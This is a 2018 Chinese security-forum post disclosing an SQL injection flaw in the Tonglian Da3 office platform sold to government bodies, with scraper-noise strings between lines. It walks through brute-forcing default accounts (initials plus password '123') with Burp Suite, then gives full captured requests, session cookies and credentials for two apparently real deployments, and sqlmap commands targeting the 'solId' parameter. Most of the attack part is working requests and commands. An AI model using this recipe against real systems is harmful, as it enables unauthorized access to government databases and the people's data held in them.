找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1356|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

$ |4 u6 S8 T; L) x L
/ w6 u' G4 o' {6 z" b5 _" q# U4 f4 l

7 Y1 D! a: F0 V: B! N; Y

f) A7 h, x2 @# {8 F2 v 平台简介: 6 r+ H$ }" e! J' ]+ k" l

1 F# J/ k& ?/ U0 z9 c4 F/ H

( ]. m* n. u& b+ y4 }7 U  3 A! f) v5 [5 v1 X

: f$ q- Y4 J. X, B+ h/ O0 r* r9 z

* e$ |) H3 O# e$ T5 S) x+ n8 R0 ? 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; ^, k8 ]( T- }- F同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' a* a1 x, o% V- F7 v7 N8 r同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!$ C9 k, p$ u/ }: a3 R; s% U1 h

3 F2 Y3 X H% ~+ S

8 ]1 b& n" t3 f* O9 \  & J: Z! L$ @' @+ |9 o: l) J

9 k4 {+ f" a! `% R* V9 s6 q/ y

y4 l/ h7 A( `- e1 H) Y4 v 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:: c! d1 L( e& \; G2 n

4 r+ c' H5 r7 \9 b

; J. ]3 A; l7 R/ s& D3 F   3 A0 y( I* z% }9 R. k

7 r' C7 o* c% c) k3 u

6 F% W0 d1 y* l http://1.1.1.1:7197/cap-aco/#(案例2-) - K. S$ ^" ?7 r8 `3 w# ?

0 `8 o0 J& |+ y1 m4 Q- S9 L

& N* M8 j i1 f, i- n8 O' s6 H, l) t http://www.XXOO.com (案例1-官网网站) $ P% m1 m2 k, Q# {" B, B

5 ^1 a x0 \, |% H A3 w4 Z8 J! o0 @

* D* F# B: u; G6 V: H4 X  ! c; V$ l. a- y5 C

+ w* U( D- }! n

* V! z# ~5 g7 I3 g9 G( E 漏洞详情: 7 o) n+ D, @- z/ j3 q u; |

: s9 _' g& a/ I6 M. s5 M. d

6 N7 T1 x e, h+ @$ q  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 1 J u, X$ W; W. N/ Z; |& j

* D$ m/ A g7 W

" Q2 x1 \$ D6 Q- G3 R$ E      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; @3 S0 x; Z) \

; q+ p7 Z8 L R: J/ o7 W

% j9 u+ [% g' a: N  $ H% [, U/ t# c+ f+ o. `

/ O7 j( a5 L4 }2 t# w) i

" f4 e& n+ s3 v" ]   * t$ G' C! \7 A

6 b$ E [) ?" `0 e& R+ c, Z

& s p( n) A' a1 v$ T: | status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:' t2 i, h% o8 a

& s/ u* U/ `( \, j* x( w( V" ]

~$ U2 w; Y. P4 G 1、案例1-官方网站! T8 F, i6 C4 l1 u

1 P0 X9 F% _7 O( w9 ^- Y# ^

; s0 f: F: ^( V/ `9 Q3 A0 v9 g0 |/ a GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 . M* e9 `: R2 J3 J: ^1 q( a: k G

& q( {/ K( J Z% a) }) S

* N0 F: M$ v& x; z# K! W: N+ R4 Y! O Host: www.XXOO.com W% I L# j: P& c0 I6 G$ I8 U

' ^. r0 L" A! ? v1 I2 z

# `$ M6 {* S% R Proxy-Connection: Keep-Alive1 ^+ S, s: E* T" R

# Y7 T' u' j' ]* |

' J7 s) |: F q: l Accept: application/json, text/javascript, */*; q=0.01& G. y/ Q% x+ x. L- B

# d* E' b9 v8 L) c

. S' O. S% ]6 ^* N, K( B Accept-Language: zh-CN - S# h* m* e5 N- N& d& E

7 w7 C+ o# d) S# \. ?) a5 d

0 j) n8 O) |+ j+ U2 ~6 e0 N3 _' i Content-Type: application/json 1 p4 m, d% s$ S! I- L6 ?* B. w

0 e) ?! f S6 F

" M1 O* _) J, G8 c/ K4 i9 X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 7 }: E0 i0 `: i6 I

8 U/ J; d. D6 b8 D

4 s2 a q( A+ p& y+ h0 v X-Requested-With: XMLHttpRequest 4 a" }: {! ]( K" S( s

* m& b# _: T1 y8 @. _# U0 t

+ P% d4 q" d2 R6 l0 c, G Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 {1 q; U% c1 [) q, m9 X

3 ]" e/ L3 i: d7 o; a. K6 C2 ~; L" t

/ c! a: l0 Q$ L! s Accept-Encoding: gzip, deflate, sdch , E% p! q) g" ]; t' I

1 e, @4 c) t! k& l% X+ @. ?

7 R3 t, k* d9 u7 H- y Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e - Y2 a, ^& L4 e: a5 R x

) z! `$ p$ j; D1 y2 O @

* F# O4 N- @5 K. h( m 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 w# E1 I; I/ j2 k; ?% ^8 R

' d# ~2 z+ H$ L) V3 B

& j0 h. F) S, t! @   , m g; b5 B2 ?9 J& j

/ {( }& E0 Y, |/ i# g9 g% i

1 L- q. @: ?0 u4 u; s3 j7 ]  5 h- `* P4 H8 I- {8 S

2 O M2 \# @9 B! M

, ]* W: e3 l& n/ V1 o  ! E# h* t2 R. e

2 f! L; }& N: Z- X8 {4 q

' T p7 ]5 |* q   ; N* U# l# D, M2 \/ Y

6 h3 p) z6 v$ B- Q3 R, {' V

! F. o( V; ?5 b3 e( F. G+ {   " h* m4 Y$ d6 r

7 ~. j6 l; B5 H1 x4 a* a

, L. `( ]6 D! v. w% _ 2、案例2-某天河云平台& j3 V9 q4 V5 N0 J2 B+ H; h

* {" ~8 b2 b/ \9 }" ~9 P. a

' t P; w4 I4 R8 w5 u GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.12 ]; J' b9 } q% f0 x% Z

' Q2 }$ f, s5 Y4 _: g8 t

* e3 [4 T+ ~. e4 c, P5 l Host: 1.1.1.:71976 D) J' Q5 p/ _+ I2 n

& r2 v) C: w* ?4 n% {# j8 f

, ^6 L. V3 T* R* D/ |! d" w9 R- L Accept: application/json, text/javascript, */*; q=0.01 - ]1 a: y5 k7 H8 l4 ~. |

( F7 G6 x- @- v0 y$ j7 Z" J

1 U6 `- H# l- w, D" ?" Q3 A3 e X-Requested-With: XMLHttpRequest t" S u% V, `7 [: n! r

+ o. \" z! u- ]& K% v( W q

; Y y& f2 d0 [8 w- M* D/ t; Y User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 ' V% K8 I' v7 q- e0 I5 Z2 q

) g* Y& j7 p: m5 A) J3 [

9 z+ t; Y* E; V Content-Type: application/json2 Z) F3 [) Z. O" q5 ]9 q5 N

) [* j" e3 F7 {3 J( b5 b

1 v$ n3 u5 w. |8 P Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008; n3 d* J) r" s i

, i' L2 @+ z* j5 N3 p+ L6 N# b

: M! o# J2 T: h+ W+ E" l, Z Accept-Language: zh-CN,zh;q=0.8 / Y) t6 ~- I! K# V. o5 Z

8 Z2 L0 {% K: Y: @

3 ?# b2 W% o/ Z& V) y F, j Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 # W0 R! Z+ Y: H, X

# Y9 d' n4 p% n2 e. O

3 C, R o7 }7 u9 o' K V Connection: close : `0 M* i$ l; l7 l2 b9 K0 ^

3 M# L4 V& G/ o" O; I

) F! H0 I- a* D! Q: ~3 F" K) { 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: : c! c8 `6 c' o$ d3 ?

0 [: x' A$ b, r% R

/ Q7 ]# I' g. c   $ ^) n" |; v$ _$ Z7 u

: g- D4 Q' n/ k0 [ h3 b

0 i. P* V6 o4 Z% v: }" g, R
9 B! D$ j" s0 X' a, t# N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表